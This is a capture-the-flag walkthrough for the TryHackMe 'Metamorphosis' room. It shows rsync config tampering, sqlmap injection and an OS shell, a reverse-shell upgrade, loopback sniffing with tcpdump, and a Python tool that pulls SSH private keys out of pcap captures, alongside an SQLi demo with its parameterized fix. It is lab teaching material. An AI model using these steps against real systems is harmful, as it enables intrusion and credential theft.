Metamorphosis

https://tryhackme.com/room/metamorphosis

User flag

Let's start with an nmap scan.

We see the SMB ports are open. After a quick enumeration we find we have no access to the shares.

Let's move to the rsync port (873). With the following command we can list the modules the server shares.

rsync -rdt rsync://10.10.133.232:873

We see we can access the Conf module. Let's download it to our machine.

rsync -av rsync://10.10.133.232:873/Conf .

Looking through the files we find nothing interesting (yet). Let's head to port 80.

We find a default Apache2 page; maybe there's a hidden folder there.

Going to /admin we see we have no access.

Checking the page source, we see the panel is only reachable in a development environment.

Earlier we found a webapp.ini file in the Conf module with the environment set to prod. The rsync module is not read-only, so we can change the environment to development and push the file back with rsync to unlock the admin folder (an anonymously writable rsync share holding the application's config is the real misconfiguration here).

rsync -av webapp.ini rsync://10.10.133.232/Conf

Now we can reach it. Let's test the query form.

From the room tags we guess there's a SQLi here. Let's check with sqlmap.

It's vulnerable. sqlmap can spawn an OS shell for us if the database user is a DBA, so let's first check who we are running as:

sqlmap -u http://10.10.52.64/admin/config.php --data="username=test" --is-dba --current-user
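The room only shows sqlmap confirming the injection. As an added example (not part of the original writeup, and not the room's actual config.php, whose schema and query are unknown), here is the shape of the bug sqlmap found: a lookup on the username parameter built by string concatenation, reproduced in Python against an in-memory SQLite table, beside the parameterized version the same payloads fail against. The table name, columns and rows are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the room's database (schema and rows are assumptions)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    """The bug: the POST parameter is pasted straight into the SQL text, so a quote
    in `username` closes the literal and the rest of the input becomes SQL."""
    query = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, username):
    """The fix: a bound parameter. The driver sends the value separately from the
    query text, so quotes, OR and UNION in the input are just characters."""
    query = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(query, (username,))]


if __name__ == "__main__":
    db = make_db()
    # Boolean payload: the WHERE clause becomes always-true and every user comes back.
    print(lookup_vulnerable(db, "test' OR '1'='1"))
    # UNION payload: pulls the password column, which is how sqlmap dumps data.
    print(lookup_vulnerable(db, "x' UNION SELECT password FROM users -- "))
    # Same payloads against the parameterized query match no row.
    print(lookup_safe(db, "test' OR '1'='1"))
```

The second payload is worth trying by hand when sqlmap is too noisy: if the form reflects anything from the query, a UNION with the same column count leaks other columns directly.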

We are in. Let's grab the flag

The shell sqlmap gives us is limited, so let's upgrade it. Start a Python HTTP server on our machine so we can download a PHP reverse shell onto the victim.

Now open the web browser and go to the following path to fire up the reverse shell (don't forget to start a listener first):

Nice. Now let's turn it into a fully interactive shell. First, in the reverse shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

Then press Ctrl+Z to background it and run this in our own terminal; it puts our terminal in raw mode and brings the shell back to the foreground:

stty raw -echo; fg

Root flag

Again, checking the room tags on TryHackMe we see a "sniff" tag, so let's sniff the traffic on the box and see if anything interesting shows up. Capturing on lo only picks up traffic between services on the box itself, which is where a local process talking to another local service would appear.

tcpdump -i lo -w sniff.pcap -v

We have to transfer the pcap file to our machine.

Let's open it in Wireshark, take a look and follow the TCP stream.

Interesting. There's a private key.

Let's copy the private key to a file, restrict its permissions (chmod 600, otherwise ssh refuses to use it) and try to log in as root with it.
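Wireshark's Follow TCP Stream does the reassembly for us. To make that step concrete, here is an added example (not part of the original writeup) that does the same thing in Python with only the standard library: it walks a classic pcap of Ethernet frames, which is what tcpdump -i lo writes on Linux, reassembles each one-way TCP stream by sequence number, and pulls out any PEM private key it finds. Because the room's capture is not reproduced on this page, the block builds its own small loopback capture inline, with an obviously fake key sent in two segments that arrive out of order plus one retransmission; the file name follow_stream.py in the usage note is just a suggestion.

```python
import re
import struct
from collections import defaultdict

# PEM-armoured private key of any flavour (RSA, OPENSSH, EC, ...).
PEM_RE = re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----.*?-----END [A-Z ]*PRIVATE KEY-----", re.S)

MAGICS = {b"\xd4\xc3\xb2\xa1": "<", b"\x4d\x3c\xb2\xa1": "<",   # little-endian, us / ns
          b"\xa1\xb2\xc3\xd4": ">", b"\xa1\xb2\x3c\x4d": ">"}   # big-endian, us / ns


def tcp_payloads(pcap_bytes):
    """Yield (flow, seq, payload) for every TCP segment carrying data in a classic pcap
    of Ethernet frames (Linux tcpdump -i lo uses DLT_EN10MB). pcapng is not handled."""
    endian = MAGICS.get(pcap_bytes[:4])
    if endian is None:
        raise ValueError("not a classic pcap file")
    if struct.unpack_from(endian + "I", pcap_bytes, 20)[0] != 1:
        raise ValueError("expected LINKTYPE_ETHERNET")
    off = 24                                         # skip the 24-byte global header
    while off + 16 <= len(pcap_bytes):
        incl_len = struct.unpack_from(endian + "I", pcap_bytes, off + 8)[0]
        frame = pcap_bytes[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                                 # not IPv4
        ip = frame[14:]
        if ip[9] != 6:
            continue                                 # not TCP
        ihl, total_len = (ip[0] & 0x0F) * 4, struct.unpack_from("!H", ip, 2)[0]
        tcp = ip[ihl:total_len]
        if len(tcp) < 20:
            continue
        sport, dport, seq = struct.unpack_from("!HHI", tcp, 0)
        payload = tcp[(tcp[12] >> 4) * 4:]           # data offset is in 32-bit words
        if payload:
            yield (ip[12:16], sport, ip[16:20], dport), seq, payload


def reassemble(pcap_bytes):
    """Follow each one-way TCP stream: sort segments by sequence number, drop
    retransmitted bytes and concatenate (32-bit sequence wrap is not handled)."""
    segments = defaultdict(list)
    for flow, seq, payload in tcp_payloads(pcap_bytes):
        segments[flow].append((seq, payload))
    streams = {}
    for flow, segs in segments.items():
        segs.sort()
        data, next_seq = b"", segs[0][0]
        for seq, payload in segs:
            end = seq + len(payload)
            if end <= next_seq:
                continue                             # pure retransmission
            data += payload[max(0, next_seq - seq):]  # trim any partial overlap
            next_seq = end
        streams[flow] = data
    return streams


def find_private_keys(pcap_bytes):
    """Every PEM private key visible in any reassembled stream, as text."""
    return [m.decode() for s in reassemble(pcap_bytes).values() for m in PEM_RE.findall(s)]


# --- constructed test capture (not the room's sniff.pcap) ---------------------------
def build_record(src, sport, dst, dport, seq, payload):
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0, src, dst) + tcp
    frame = b"\x00" * 12 + b"\x08\x00" + ip         # zeroed MACs, as on loopback
    return struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame


def constructed_capture():
    """Loopback capture in which a client pushes a fake key to a local service in two
    segments that arrive out of order, with one retransmission, plus the reply."""
    key = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
           b"constructed-example-key-material-not-a-real-key\n"
           b"-----END OPENSSH PRIVATE KEY-----\n")
    lo, first, second = bytes([127, 0, 0, 1]), key[:40], key[40:]
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    return header + b"".join([
        build_record(lo, 40000, lo, 8000, 1040, second),          # second half arrives first
        build_record(lo, 40000, lo, 8000, 1000, first),
        build_record(lo, 40000, lo, 8000, 1000, first),           # retransmission
        build_record(lo, 8000, lo, 40000, 5000, b"HTTP/1.1 200 OK\r\n\r\n"),
    ])


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else constructed_capture()
    for key in find_private_keys(data):
        print(key)
```

Run with no arguments it works on the constructed capture; `python3 follow_stream.py sniff.pcap` runs it on the real capture pulled off the box. It reads classic pcap only (not pcapng) and ignores sequence-number wrap, which is fine for a short capture like this one.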
